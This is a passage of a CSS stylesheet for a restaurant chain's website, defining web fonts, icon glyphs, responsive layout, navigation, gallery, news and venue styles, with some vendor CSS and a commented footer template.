font-style: normal;
}
@font-face {
font-family: 'Museo300Regular';
src: url("../fonts/Museo300-Regular-webfont.eot");
src: url("../fonts/Museo300-Regular-webfont.eot?#iefix") format("embedded-opentype"), url("../fonts/Museo300-Regular-webfont.woff") format("woff"), url("../fonts/Museo300-Regular-webfont.ttf") format("truetype"), url("../fonts/Museo300-Regular-webfont.svg#Museo300Regular") format("svg");
font-weight: normal;
font-style: normal;
}
@font-face {
font-family: 'Museo500Regular';
src: url("../fonts/Museo500-Regular-webfont.eot");
src: url("../fonts/Museo500-Regular-webfont.eot?#iefix") format("embedded-opentype"), url("../fonts/Museo500-Regular-webfont.woff") format("woff"), url("../fonts/Museo500-Regular-webfont.ttf") format("truetype"), url("../fonts/Museo500-Regular-webfont.svg#Museo500Regular") format("svg");
font-weight: normal;
font-style: normal;
}
@font-face {
font-family: 'bills';
src: url("../fonts/bills.eot");
src: url("../fonts/bills.eot?#iefix") format("embedded-opentype"), url("../fonts/bills.woff") format("woff"), url("../fonts/bills.ttf") format("truetype"), url("../fonts/bills.svg#bills") format("svg");
font-weight: normal;
font-style: normal;
}
.icon-ignite-logo,
.icon-facebook,
.icon-twitter,
.icon-pinterest,
.icon-googleplus,
.icon-reorder,
.icon-pointer,
.icon-arrow-right,
.icon-arrow-left,
.icon-angle-down,
.icon-circle-arrow-down,
.icon-menus,
.icon-capacity,
.icon-hours,
.icon-search,
.icon-venue-stretch,
.icon-angle-up,
.icon-angle-right,
.icon-angle-left {
font-family: 'bills';
speak: none;
font-style: normal;
font-weight: normal;
font-variant: normal;
text-transform: none;
-webkit-font-smoothing: antialiased;
}
.icon-ignite-logo:before {
content: "\e000";
}
.icon-facebook:before {
content: "\e001";
}
.icon-twitter:before {
content: "\e002";
}
.icon-pinterest:before {
content: "\e003";
}
.icon-googleplus:before {
content: "\e004";
}
.icon-reorder:before {
content: "\e005";
}
.icon-pointer:before {
content: "\e006";
}
.icon-arrow-right:before {
content: "\e007";
}
.icon-arrow-left:before {
content: "\e008";
}
.icon-angle-down:before {
content: "\e009";
}
.icon-circle-arrow-down:before {
content: "\e010";
}
.icon-menus:before {
content: "\e011";
}
.icon-capacity:before {
content: "\e012";
}
.icon-hours:before {
content: "\e013";
}
.icon-search:before {
content: "\f002";
}
.icon-venue-stretch:before {
content: "\e00a";
}
.icon-angle-up:before {
content: "\f106";
}
.icon-angle-right:before {
content: "\f105";
}
.icon-angle-left:before {
content: "\f104";
}
/* TYPOGRAPHY */
/* COLOURS */
/* BORDERS */
/* SPACING */
/* RELATIVE SIZES */
/* BREAKPOINTS */
/* LOGO */
/* IE */
/*------------------------------------*\
$FONT SIZE
\*------------------------------------*/
/*------------------------------------*\
$MEDIA QUERY
\*------------------------------------*/
/*------------------------------------*\
$CLEARFIX
\*------------------------------------*/
.clearfix:after,
.media:after,
.wrapper:after,
.site-header:after,
.logo-wrapper:after,
.site-social:after,
.site-social__list:after,
.pagination:after,
.menu-location:after,
.venue:after,
.venue__row:after,
.page--hours-and-locations .booking-widget:after,
.booking-widget__form:after {
content: "";
display: table;
clear: both;
}
/*------------------------------------*\
$IMAGE REPLACEMENT
\*------------------------------------*/
.image-replacement {
border: 0;
font: 0/0 a;
text-shadow: none;
color: transparent;
background-color: transparent;
}
/*------------------------------------*\
$JAVASCRIPT MEDIA QUERIES
\*------------------------------------*/
/**
* Sync CSS media queries with perfectly using the following javascript:
*
var size = window.getComputedStyle(document.body,':after').getPropertyValue('content');
if (size.indexOf("lap-and-up") !=-1) {
} else if (size.indexOf("desk") !=-1) {
} else if (size.indexOf("desk-wide") !=-1) {
}
*
*/
body:after {
display: none;
}
@media only screen and (min-width: 569px) {
body:after {
content: 'lap-and-up';
}
}
@media only screen and (min-width: 1024px) {
body:after {
content: 'desk lap-and-up';
}
}
@media only screen and (min-width: 1200px) {
body:after {
content: 'desk-wide desk lap-and-up';
}
}
/*------------------------------------*\
$LISTS
\*------------------------------------*/
.clear-list,
.inline-list {
list-style-type: none;
padding: 0;
margin: 0;
}
.inline-list > * {
display: inline-block;
}
/*------------------------------------*\
$MEDIA OBJECT
\*------------------------------------*/
.media {
display: block;
}
.media__img {
float: left;
margin-right: 22px;
}
.media__img--rev {
float: right;
margin-left: 22px;
}
.media__img img,
.media__img--rev img {
display: block;
}
.media__body {
overflow: hidden;
}
.media__body > * {
margin-top: 0;
}
.media__body,
.media__body > :last-child {
margin-bottom: 0;
}
/*------------------------------------*\
$BUTTONS
\*------------------------------------*/
.button,
.venue-menus a {
display: inline-block;
background-color: #ff8400;
color: white;
padding: 11px;
}
.button--big {
padding: 22px;
}
/*------------------------------------*\
$ICON
\*------------------------------------*/
.icon--left {
margin-right: 5.5px;
}
.icon--right {
margin-left: 5.5px;
}
.icon-rounded {
display: inline-block;
padding: 5.5px;
color: #b3b3b3;
border-radius: 44px;
background-color: white;
}
/*------------------------------------*\
$RESPONSIVE-NAV.JS v1.0.14 by @viljamis
\*------------------------------------*/
/**
* I tried not to touch this as it is not written by me, but I was forced to alter selectors to get rid of the id's in the CSS.
* Changed everything from '#nav' to '.nav' and from '#nav-toggle' to '.nav-toggle'.
*/
.nav ul {
margin: 0;
padding: 0;
width: 100%;
display: block;
list-style: none;
}
.nav li {
width: 100%;
display: block;
}
.js .nav {
clip: rect(0 0 0 0);
max-height: 0;
position: absolute;
display: block;
overflow: hidden;
zoom: 1;
}
@media only screen and (min-width: 569px) {
.js .nav {
position: relative;
}
}
.js .nav.closed {
max-height: none;
}
.nav.opened {
max-height: 9999px;
}
@media only screen and (min-width: 569px) {
.nav-toggle {
display: none;
}
}
/* ----------------------------------------------------------------
MaxCycle (Fullscreen Slideshow for use with jQuery Cycle Plugin)
----------------------------------------------------------------
Demo at: http://www.aaronvanderzwan.com/maxcycle/
Download and Info at: http://github.com/akv2/MaxCycle---jQuery-Plugin/
Copyright (c) 2007-2011 Aaron Vanderzwan
Dual licensed under the MIT and GPL licenses.
*/
/* Version: 2.0.73 (12-Oct-2012) */
.mc-hide-scrolls {
overflow: hidden;
}
body .mc-cycle {
height: 100%;
left: 0;
overflow: hidden;
position: fixed;
top: 0;
width: 100%;
z-index: -1;
}
div.mc-image {
/*NOTE: Mozilla flickers when fading and using 'all', so we have to be specific with what property we want to transition:
If you are using fading transitions, use 'opacity: */
-webkit-transition: opacity 1s ease-in-out;
-o-transition: opacity 1s ease-in-out;
transition: opacity 1s ease-in-out;
/* If you are using horizontal slide transitions, use the following CSS: */
-webkit-transition: left 1s ease-in-out;
-o-transition: left 1s ease-in-out;
transition: left 1s ease-in-out;
-webkit-background-size: cover;
background-size: cover;
background-position: center center;
background-repeat: no-repeat;
height: 100%;
overflow: hidden;
width: 100%;
}
.mc-old-browser .mc-image {
overflow: hidden;
}
* {
-moz-box-sizing: border-box;
box-sizing: border-box;
}
html {
position: relative;
min-height: 100%;
overflow-x: hidden;
font: 0.875em/1.57143 "Museo500Regular", sans-serif;
color: white;
background: #222222;
}
body {
height: 100%;
}
h1,
h2,
h3,
h4,
h5,
h6,
ul,
ol,
dl,
blockquote,
p,
address,
table,
fieldset,
figure,
pre,
.main__content,
.news__item,
.post__header,
.post__aside,
.box-heading,
.menu-location,
.menu-nav,
.menu__item,
.venue,
#map_canvas,
#map_canvas_loc,
.media {
margin-bottom: 22px;
margin-bottom: 1.57143rem;
}
.menu-locations,
#map_accordion ul,
.lead,
.landmark {
margin-bottom: 44px;
margin-bottom: 3.14286rem;
}
.menu-nav__item > a {
margin-bottom: 11px;
margin-bottom: 0.78571rem;
}
h1,
h2,
h3,
h4,
h5,
h6,
.page-title--mobile,
.book-toggle,
.nav-toggle,
.site-nav,
.splash,
.pagination,
.social-bit,
.post__aside,
.post__back,
.menu-locations__item,
#map_accordion li,
.venue__footer,
.book-circle__inner {
font-family: "AlternateGothic2 BT", sans-serif;
font-weight: normal;
text-transform: uppercase;
text-rendering: optimizeLegibility;
}
h1,
.alpha {
font-size: 36px;
font-size: 2.57143rem;
line-height: 1.22222;
}
h2,
.beta {
font-size: 30px;
font-size: 2.14286rem;
line-height: 1.46667;
}
h3,
.gamma {
font-size: 24px;
font-size: 1.71429rem;
line-height: 1.83333;
}
h4,
.delta {
font-size: 20px;
font-size: 1.42857rem;
line-height: 1.1;
}
h5,
.epsilon {
font-size: 16px;
font-size: 1.14286rem;
line-height: 1.375;
}
h6,
.zeta {
font-size: 14px;
font-size: 1rem;
line-height: 1.57143;
}
a {
text-decoration: none;
color: #ff8400;
}
.site-header a {
color: white;
}
.main__content img {
max-width: 100%;
}
/*------------------------------------*\
$WRAPPER
\*------------------------------------*/
.wrapper {
min-height: 100%;
}
@media only screen and (max-width: 568px) {
.wrapper {
overflow-x: hidden;
}
}
@media only screen and (max-width: 1023px) {
.wrapper {
background: -webkit-linear-gradient(top, rgba(0, 0, 0, 0.9) 0%, transparent 176px);
background: -o-linear-gradient(top, rgba(0, 0, 0, 0.9) 0%, transparent 176px);
background: linear-gradient(to bottom, rgba(0, 0, 0, 0.9) 0%, transparent 176px);
}
}
@media only screen and (min-width: 569px) {
.wrapper {
padding: 22px;
}
}
/*------------------------------------*\
$HEADER
\*------------------------------------*/
@media only screen and (min-width: 569px) and (max-width: 1023px) {
.site-header {
border-bottom: white solid 5px;
margin-bottom: 22px;
position: relative;
}
}
@media only screen and (min-width: 1024px) {
.site-header {
position: fixed;
left: 0;
top: 0;
bottom: 0;
height: 100%;
padding: 22px;
z-index: 20;
width: 235px;
background: -webkit-linear-gradient(left, rgba(0, 0, 0, 0.9) 0%, transparent 100%);
background: -o-linear-gradient(left, rgba(0, 0, 0, 0.9) 0%, transparent 100%);
background: linear-gradient(to right, rgba(0, 0, 0, 0.9) 0%, transparent 100%);
}
}
@media only screen and (min-width: 1024px) and (max-height: 600px) {
.site-header {
position: absolute;
}
}
/*------------------------------------*\
$MAIN
\*------------------------------------*/
@media only screen and (min-width: 1024px) {
.main,
#footer_nav {
margin-left: 235px;
}
}
@media only screen and (min-width: 1200px) {
.main,
#footer_nav {
margin-right: 191px;
}
}
@media only screen and (min-width: 1024px) {
.main__header {
display: table;
height: 198px;
}
}
.main__content {
padding: 22px 11px;
position: relative;
background: white;
background: rgba(255, 255, 255, 0.95);
color: #222222;
}
@media only screen and (min-width: 569px) {
.main__content {
padding: 33px;
}
}
/*------------------------------------*\
$SITE FOOTER
\*------------------------------------*/
/**
* The footer with the animated restaurant logos is a global ModX chunk for all the BR sites,
* below is the HTML structure of the chunk. The most outer div is not included in the chunk.
*
<div class="site-footer" id="footer_wrap">
<!-- this is where the chunk starts -->
<div id="footer">
<div class="footer_links simply-scroll-container">
<div class="simply-scroll-clip">
<div id="footer_links" class="simply-scroll-list">
<div class="footer_slide_img">
<a><img></a>
</div>
<div class="footer_slide_img">
<a><img></a>
</div>
<div class="footer_slide_img">
<a><img></a>
</div>
</div>
</div>
</div><!-- end #footer_links -->
<div id="footer_nav">
<div id="br_logo">
<a><img></a>
</div>
<div id="rest_green">
<img>
</div>
<div id="footer_nav_links">
<div id="address_ignite">
<a>Privacy, Terms & Conditions</a>
<a id="btmNav_copyright">Copyright 2013</a>
<a id="btmNav_ignite"><span>Restaurant Website Design & SEO by Ignite Hospitality Consultants</span> <img></a>
</div>
</div><!-- end #footer_nav_links -->
</div><!-- end #footer_nav -->
</div><!-- end #footer -->
<!-- this is where the chunk ends -->
</div>
*
*/
.site-footer {
font-size: 12px;
font-size: 0.85714rem;
line-height: 1.83333;
padding: 0 22px;
background: #222222;
}
.site-footer a {
color: white;
display: inline-block;
}
.page--bills-bar-burger .site-footer,
.page--gallery .site-footer {
display: none;
/* height: $unit * 6;
position: absolute;
top: 100%;
left: 0;
width: 100%; */
}
#footer_nav {
padding-bottom: 55px;
position: relative;
text-align: center;
margin-top: 22px;
}
#footer_nav #br_logo {
left: 22px;
}
@media only screen and (min-width: 1024px) {
#footer_nav #br_logo {
left: 0;
}
}
#footer_nav #rest_green {
right: 22px;
}
@media only screen and (min-width: 1024px) {
#footer_nav #rest_green {
right: 0;
}
}
#footer_nav #btmNav_privacy {
margin-top: 66px !important;
}
@media only screen and (min-width: 569px) {
#footer_nav #btmNav_privacy {
margin-top: 0 !important;
}
}
#footer_nav #br_logo,
#footer_nav #rest_green {
position: absolute;
top: 0;
}
#footer_nav #footer_nav_links a {
margin: 0 11px;
}
#footer_nav #btmNav_ignite {
display: block;
}
/*------------------------------------*\
$PAGE TITLE
\*------------------------------------*/
.page-title {
margin: 0;
padding-top: 11px;
padding-bottom: 11px;
font-size: 34px;
font-size: 2.42857rem;
line-height: 1.29412;
}
@media only screen and (max-width: 568px) {
.page-title {
padding-left: 22px;
}
}
@media only screen and (min-width: 569px) {
.page-title {
display: table-cell;
vertical-align: middle;
text-shadow: 10px 10px 50px black, 10px -10px 50px black;
font-size: 70px;
font-size: 5rem;
line-height: 1.25714;
}
}
.page--gallery .page-title,
.page--bills-bar-burger-rockefeller-center .page-title,
.page--bills-bar-burger-meatpacking-district .page-title,
.page--bills-bar-and-burger-atlantic-city .page-title {
font-size: 50px;
font-size: 3.57143rem;
}
.page-title--mobile {
font-size: 50px;
font-size: 3.57143rem;
line-height: 1.32;
}
@media only screen and (max-width: 568px) {
.page-title--mobile {
padding-left: 11px;
}
}
@media only screen and (min-width: 569px) and (max-width: 1023px) {
.page-title--mobile {
position: absolute;
top: 33px;
right: 0;
white-space: pre;
line-height: 77px;
}
}
@media only screen and (min-width: 1024px) {
.page-title--mobile {
display: none;
}
}
.page--bills-bar-burger .page-title--mobile {
display: none;
}
/*------------------------------------*\
$LOGO
\*------------------------------------*/
@media only screen and (max-width: 568px) {
.logo-wrapper {
border-top: 5px solid white;
border-bottom: 5px solid white;
margin-top: 11px;
}
}
@media only screen and (min-width: 569px) and (max-width: 1023px) {
.logo-wrapper {
float: left;
width: 20%;
height: 132px;
}
}
.site-logo {
display: block;
text-align: center;
}
@media only screen and (max-width: 1023px) {
.site-logo {
padding: 16px 11px 0;
}
}
@media only screen and (max-width: 568px) {
.site-logo {
width: 50%;
}
}
@media only screen and (min-width: 569px) and (max-width: 1023px) {
.site-logo {
vertical-align: middle;
}
}
@media only screen and (min-width: 1024px) {
.site-logo {
padding: 22px 0 44px;
border-top: 5px solid white;
}
}
.site-logo img {
vertical-align: bottom;
max-width: 100%;
}
@media only screen and (max-width: 568px) {
.site-logo img {
max-height: 88px;
}
}
.page--bills-bar-burger .site-logo {
border-bottom: 0;
}
/*------------------------------------*\
$TOGGLES
\*------------------------------------*/
.toggles {
border-left: 5px solid white;
float: right;
width: 50%;
}
@media only screen and (min-width: 569px) {
.toggles {
display: none;
border-left: none;
}
}
.book-toggle {
padding: 5.5px 11px;
position: relative;
text-align: center;
cursor: pointer;
font-size: 23px;
font-size: 1.64286rem;
}
.book-toggle.open {
background: white;
color: #ff8400;
}
.book-toggle .icon {
font-size: 30px;
font-size: 2.14286rem;
line-height: 1.46667;
font-weight: bold;
}
.book-drawer {
width: 100%;
max-height: 0;
overflow: hidden;
position: absolute;
right: 0;
color: #222222;
background: white;
-webkit-transition: max-height 400ms ease-in-out;
-o-transition: max-height 400ms ease-in-out;
transition: max-height 400ms ease-in-out;
z-index: 100;
}
.book-drawer.open {
max-height: 100%;
}
.nav-toggle {
padding: 5.5px 11px;
border-top: 5px solid white;
text-align: center;
cursor: pointer;
font-size: 23px;
font-size: 1.64286rem;
line-height: 1.91304;
}
.nav-toggle.open,
.nav-toggle:active {
background: white;
color: #ff8400;
}
/*------------------------------------*\
$NAVIGATION
\*------------------------------------*/
/**
* Some !important tags are needed to overwrite responsive-nav.js, see sass/vendor/_responsive-nav.scss
*/
.site-nav {
font-size: 22px;
font-size: 1.57143rem;
line-height: 1;
}
@media only screen and (max-width: 568px) {
.site-nav {
background: white;
z-index: 2;
}
.site-nav a {
color: #474747;
}
}
@media only screen and (min-width: 569px) {
.site-nav {
max-height: initial;
overflow: visible !important;
}
}
@media only screen and (min-width: 569px) and (max-width: 1023px) {
.site-nav {
border-bottom: white solid 5px;
}
}
@media only screen and (min-width: 1024px) {
.site-nav {
line-height: 33px;
margin-bottom: 22px;
font-size: 26px;
font-size: 1.85714rem;
}
}
@media only screen and (max-width: 568px) {
.site-nav__inner {
padding: 14.66667px 0;
}
}
@media only screen and (max-width: 568px) {
.site-nav__list {
position: relative;
border-top: 1px solid #b3b3b3;
padding: 0;
overflow: hidden;
}
.site-nav__list:before {
content: '';
position: absolute;
display: block;
height: 100%;
width: 50%;
top: 0;
border-right: 1px solid #b3b3b3;
}
}
@media only screen and (min-width: 1024px) {
.site-nav__list {
padding: 11px 0 !important;
border-top: 5px solid white;
border-bottom: 5px solid white;
}
}
@media only screen and (max-width: 568px) {
.site-nav__item {
padding: 22px 11px;
width: 50% !important;
position: relative;
float: left;
border-bottom: 1px solid #b3b3b3;
}
}
@media only screen and (min-width: 569px) and (max-width: 1023px) {
.site-nav__item {
display: table !important;
padding: 0 11px;
text-align: center;
width: 20% !important;
float: left;
border-top: 5px solid white;
border-right: 5px solid white;
height: 66px;
}
.site-nav__item:nth-child(5) {
border-right: 0;
}
}
.site-nav__item a {
display: table-cell;
vertical-align: middle;
}
.site-nav__item a:hover {
color: #ff8400;
}
@media only screen and (min-width: 569px) {
.site-nav__item--home {
display: none !important;
}
}
@media only screen and (min-width: 569px) and (max-width: 1023px) {
.site-nav__item--current,
.page--menus-and-food .site-nav__item--menus,
.page--special-events .site-nav__item--events,
.page--whats-happening .site-nav__item--news,
.page--gallery .site-nav__item--gallery,
.page--about-bills .site-nav__item--about,
.page--hours-and-locations .site-nav__item--locations,
.page--bills-bar-burger-rockefeller-center .site-nav__item--locations,
.page--bills-bar-burger-meatpacking-district .site-nav__item--locations,
.page--bills-bar-burger-atlantic-city .site-nav__item--locations,
.page--bills-bar-burger-downtown .site-nav__item--locations,
.page--book-here .site-nav__item--book {
background: white;
}
}
.site-nav__item--current a,
.page--menus-and-food .site-nav__item--menus a,
.page--special-events .site-nav__item--events a,
.page--whats-happening .site-nav__item--news a,
.page--gallery .site-nav__item--gallery a,
.page--about-bills .site-nav__item--about a,
.page--hours-and-locations .site-nav__item--locations a,
.page--bills-bar-burger-rockefeller-center .site-nav__item--locations a,
.page--bills-bar-burger-meatpacking-district .site-nav__item--locations a,
.page--bills-bar-burger-atlantic-city .site-nav__item--locations a,
.page--bills-bar-burger-downtown .site-nav__item--locations a,
.page--book-here .site-nav__item--book a {
color: #ff8400;
text-decoration: line-through;
}
/*------------------------------------*\
$EXPANDABLE NAVIGATION
\*------------------------------------*/
/*------------------------------------*\
$CURRENT NAVIGATION ITEM
\*------------------------------------*/
/**
* At the moment the navigation is not being pulled in dynamicly by Modx and is static instead.
*/
/*------------------------------------*\
$INTRO COPY
\*------------------------------------*/
@media only screen and (max-width: 1023px) {
.intro-copy {
display: none;
}
.page--bills-bar-burger .intro-copy {
display: block;
position: absolute;
top: 121px;
padding: 22px;
}
}
@media only screen and (max-height: 700px) {
.intro-copy {
display: none;
}
}
/*------------------------------------*\
$SITE SOCIAL
\*------------------------------------*/
.site-social {
border-top: 5px solid white;
text-align: center;
text-transform: uppercase;
}
@media only screen and (max-width: 568px) {
.site-social {
display: none;
}
}
@media only screen and (min-width: 569px) and (max-width: 1023px) {
.site-social {
float: left;
width: 20%;
height: 66px;
overflow: hidden;
}
}
@media only screen and (min-width: 1024px) {
.site-social {
position: fixed;
width: 191px;
left: 22px;
bottom: 44px;
line-height: 44px;
border: 3px solid white;
font-size: 12px;
font-size: 0.85714rem;
line-height: 1.83333;
}
}
@media only screen and (max-height: 600px) {
.site-social {
position: relative;
left: auto;
bottom: auto;
}
}
.site-social__signup {
display: block;
border-bottom: 3px solid white;
line-height: 33px;
text-align: left;
text-indent: 11px;
}
.site-social__signup:hover {
color: #ff8400;
}
@media only screen and (max-width: 1023px) {
.site-social__signup {
display: none;
}
}
@media only screen and (max-width: 1023px) {
.site-social__title {
display: none;
}
}
@media only screen and (min-width: 1024px) {
.site-social__title {
float: left;
padding: 0 11px;
font-family: "museo_slab500", Verdana, sans-serif;
line-height: 33px;
}
}
@media only screen and (min-width: 569px) and (max-width: 1023px) {
.site-social__list {
line-height: 61px;
}
}
@media only screen and (min-width: 1024px) {
.site-social__list {
float: right;
line-height: 33px;
}
}
@media only screen and (min-width: 569px) {
.site-social__item {
width: 33.333%;
border-left: 5px solid white;
float: left;
}
}
@media only screen and (max-width: 1023px) {
.site-social__item:first-child {
border-left: none;
}
}
@media only screen and (min-width: 1024px) {
.site-social__item {
padding: 0 5.5px;
border-left-width: 3px;
}
}
.site-social__item .icon {
padding: 5.5px;
border-radius: 100%;
color: #222222;
background: white;
}
.site-social__item .icon:hover {
background: #ff8400;
}
/*------------------------------------*\
$GALLERY
\*------------------------------------*/
.gallery-nav {
display: none;
border: 3px solid white;
cursor: pointer;
}
@media only screen and (min-width: 569px) {
.gallery-nav {
display: inline-block;
position: fixed;
bottom: 44px;
right: 44px;
}
}
@media only screen and (max-height: 380px) {
.gallery-nav {
position: absolute;
}
}
.gallery-nav__item {
display: inline-block;
padding: 3.66667px 22px;
color: white;
font-size: 30px;
font-size: 2.14286rem;
line-height: 1.46667;
}
.gallery-nav__item:hover {
color: #ff8400;
}
.gallery-nav__item:first-child {
border-right: 3px solid white;
}
.gallery-select {
display: inline-block;
min-width: 180px;
}
@media only screen and (max-width: 568px) {
.gallery-select {
margin-left: 22px;
}
}
.mc-image[data-href] {
cursor: pointer;
}
.mc-image[data-href=""] {
cursor: default;
}
/*------------------------------------*\
$NEWS
\*------------------------------------*/
.news__item {
height: 220px;
}
@media only screen and (min-width: 569px) {
.news__item {
float: left;
}
}
@media only screen and (min-width: 569px) {
.news__item--small {
width: 33.333%;
}
}
@media only screen and (min-width: 569px) {
.news__item--medium {
width: 63.667%;
margin-left: 3%;
}
}
/*------------------------------------*\
$POST EXCERPT
\*------------------------------------*/
* > .post-excerpt:first-child {
height: 100%;
width: 100%;
}
* > .post-excerpt:first-child .post-excerpt__box,
* > .post-excerpt:first-child .splash {
height: 352px;
}
.post-excerpt__box,
.splash {
display: block;
height: 220px;
margin-bottom: 0;
position: relative;
overflow: hidden;
}
.post-excerpt__image {
max-width: initial !important;
min-width: 100%;
}
.post-excerpt__title {
position: absolute;
bottom: 11px;
left: 11px;
margin-right: 11px;
padding: 11px;
margin-top: 0;
margin-bottom: 0;
background: white;
background: rgba(255, 255, 255, 0.75);
color: #222222;
letter-spacing: .1em;
white-space: pre;
font-size: 18px;
font-size: 1.28571rem;
line-height: 1.22222;
}
/*
.post-excerpt__more{
@extend %heading;
color: $black;
line-height: $unit * 2;
@include font-size(15px, false);
&:hover{
color: $orange;
}
}
*/
/*------------------------------------*\
$SPLASH
\*------------------------------------*/
.splash {
display: none;
}
@media only screen and (min-width: 569px) {
.splash {
display: table;
text-align: center;
letter-spacing: .1em;
}
}
.splash--two {
margin-bottom: 22px;
}
.splash__inner {
display: table-cell;
vertical-align: middle;
}
.splash__title {
margin: 0;
line-height: 44px;
font-size: 37px;
font-size: 2.64286rem;
}
.splash__title__first-line {
display: block;
line-height: 88px;
font-size: 120px;
font-size: 8.57143rem;
}
.splash__subline {
margin: 0;
color: #474747;
line-height: 22px;
font-size: 22px;
font-size: 1.57143rem;
}
/*------------------------------------*\
$PAGINATION
\*------------------------------------*/
.pagination {
clear: both;
color: #222222;
line-height: 44px;
background: url("../images/hr.png") repeat-x, url("../images/hr.png") repeat-x bottom;
}
.pagination a {
width: 49%;
color: #b3b3b3;
font-size: 22px;
font-size: 1.57143rem;
}
.pagination a:last-child {
float: right;
text-align: right;
}
/*------------------------------------*\
$SOCIAL BIT
\*------------------------------------*/
.social-bit {
clear: both;
text-align: center;
line-height: 66px;
background: url("../images/social-bit.png") center center no-repeat;
font-size: 18px;
font-size: 1.28571rem;
}
.social-bit .icon {
padding: 5.5px;
border-radius: 100%;
background: #474747;
color: #e1e1e1;
}
.social-bit .icon:hover {
background: #ff8400;
}
/*------------------------------------*\
$POST
\*------------------------------------*/
.post__header {
min-height: 132px;
max-height: 396px;
position: relative;
overflow: hidden;
}
.post__title {
padding: 11px;
margin-top: 0;
position: absolute;
top: 22px;
left: 22px;
background: #222222;
background: rgba(34, 34, 34, 0.9);
color: white;
}
.post__image {
width: 100%;
}
.post__copy {
overflow: hidden;
}
.post__aside {
letter-spacing: .1em;
font-size: 18px;
font-size: 1.28571rem;
line-height: 1.22222;
}
@media only screen and (min-width: 569px) {
.post__aside {
float: right;
margin-left: 22px;
}
}
.post__back {
display: inline-block;
background: #ff8400;
padding: 11px;
white-space: pre;
}
.post__back a {
color: white;
}
/*------------------------------------*\
$POST SOCIAL
\*------------------------------------*/
.post-social__title {
margin: 0;
line-height: 44px;
font-size: 20px;
font-size: 1.42857rem;
}
.post-social__item {
display: block;
padding: 11px;
margin-bottom: 11px;
color: white;
}
.post-social__item:after {
content: '>';
margin-left: 22px;
}
.post-social__item .icon {
display: inline-block;
padding: 3.66667px;
margin-right: 11px;
background: white;
border-radius: 50px;
}
.post-social__item--twitter {
background-color: #4099ff;
}
.post-social__item--twitter .icon {
color: #4099ff;
}
.post-social__item--facebook {
background-color: #3b5998;
}
.post-social__item--facebook .icon {
color: #3b5998;
}
/*------------------------------------*\
$NEWS BREAKOUT
\*------------------------------------*/
.news-breakout {
display: block;
margin-top: 22px;
text-align: center;
}
/*------------------------------------*\
$EVENT VENUE
\*------------------------------------*/
.events {
margin: 44px 0;
text-align: center;
}
.event-venue {
padding: 0 11px;
margin-bottom: 22px;
}
@media only screen and (min-width: 700px) {
.event-venue {
display: inline-block;
width: 33%;
margin-bottom: 0;
vertical-align: top;
}
}
.event-venue__image {
display: inline-block;
}
.event-venue__title {
font-family: "Museo500Regular", sans-serif;
letter-spacing: .1em;
white-space: pre;
font-size: 16px;
font-size: 1.14286rem;
line-height: 1.375;
}
.event-venue__title a {
color: #222222;
}
.event-venue__link {
display: inline-block;
padding: 11px;
color: white;
background-color: #ff8400;
}
.event-venue__link i {
display: inline-block;
margin-left: 11px;
}
/*------------------------------------*\
$BOX HEADING
\*------------------------------------*/
.box-heading {
padding-bottom: 3px;
margin-top: 0;
background: url("../images/hr-2.png") repeat-x bottom;
font-size: 18px;
font-size: 1.28571rem;
line-height: 1.22222;
}
.box-heading span {
display: inline-block;
padding: 11px 22px;
margin-left: 11px;
background-color: #2b2b2b;
color: white;
}
/*------------------------------------*\
$MENU LOCATIONS
\*------------------------------------*/
.menu-locations,
#map_accordion ul {
background: url("../images/hr-2.png") top repeat-x, url("../images/hr-2.png") bottom repeat-x;
padding: 11px 0;
}
@media only screen and (min-width: 569px) {
.menu-locations,
#map_accordion ul {
text-align: center;
}
}
.menu-locations__item,
#map_accordion li {
letter-spacing: .1em;
font-size: 22px;
font-size: 1.57143rem;
line-height: 1;
}
@media only screen and (min-width: 569px) {
.menu-locations__item,
#map_accordion li {
display: inline-block;
margin: 0 22px;
}
}
.menu-locations__item a,
#map_accordion li a {
display: block;
color: #b3b3b3;
line-height: 44px;
}
@media only screen and (min-width: 1024px) {
.menu-locations__item--active {
position: relative;
}
.menu-locations__item--active::after {
display: block;
content: '';
position: absolute;
bottom: -8px;
border: transparent 11px solid;
border-bottom-color: #2b2b2b;
left: 50%;
margin-left: -5.5px;
}
}
.menu-locations__item--active a {
color: #2b2b2b;
}
/*------------------------------------*\
$MENU LOCATION
\*------------------------------------*/
.menu-location {
font-family: "museo_slab500", Verdana, sans-serif;
}
/*------------------------------------*\
$MENU NAV
\*------------------------------------*/
.menu-nav {
float: left;
margin-right: 22px;
}
@media only screen and (min-width: 569px) {
.menu-nav {
margin-right: 44px;
}
}
.menu-nav__list {
text-transform: uppercase;
}
.menu-nav__item > a {
display: block;
color: #474747;
}
.menu-nav--sub__list {
text-transform: capitalize;
list-style: none;
padding-left: 0;
margin-top: 11px;
}
@media only screen and (min-width: 569px) {
.menu-nav--sub__list {
padding-left: 22px;
}
}
.menu-nav--sub__list a {
color: #b3b3b3;
}
.menu-nav--sub__item--active a {
color: #ff8400;
}
/*------------------------------------*\
$MENU
\*------------------------------------*/
.menu {
overflow: hidden;
position: relative;
}
.menu__title {
margin-top: 0;
font-family: "Museo500Regular", sans-serif;
font-size: 28px;
font-size: 2rem;
}
.menu__item__title {
text-transform: uppercase;
}
/*------------------------------------*\
$DELIVERY BUTTON
\*------------------------------------*/
.delivery-button {
margin-right: 11px;
margin-bottom: 11px;
font-size: 13px;
font-size: 0.92857rem;
line-height: 1.69231;
}
/*------------------------------------*\
$VENUE
\*------------------------------------*/
.venue__header {
height: 308px;
margin-bottom: 33px;
position: relative;
overflow: hidden;
}
.venue__header .button,
.venue__header .venue-menus a,
.venue-menus .venue__header a {
position: absolute;
right: 0;
top: 0;
}
.venue__header img {
max-width: initial;
min-width: 100%;
}
.venue__footer {
padding: 22px 0 22px;
margin: 0;
position: absolute;
bottom: 0;
left: 0;
width: 100%;
background: url("../images/text-footer.png") left bottom repeat-x;
color: white;
text-align: center;
font-size: 20px;
font-size: 1.42857rem;
line-height: 1.1;
}
.venue__footer a {
color: white;
text-decoration: underline;
}
.venue__caption {
width: 100%;
padding: 22px;
margin-bottom: 0;
position: absolute;
bottom: 0;
left: 0;
background-color: #222222;
background-color: rgba(0, 0, 0, 0.7);
font-family: "museo_slab500", Verdana, sans-serif;
color: white;
font-size: 17px;
font-size: 1.21429rem;
line-height: 1.29412;
}
.venue__row {
padding-bottom: 33px;
margin-bottom: 33px;
background: url("../images/hr-2.png") bottom repeat-x;
}
.venue__row > :last-child {
margin-right: 0;
}
* > .venue__row:last-child {
background: none;
padding-bottom: 0;
}
@media only screen and (max-width: 568px) {
.venue__item {
margin-bottom: 44px;
}
}
@media only screen and (min-width: 569px) {
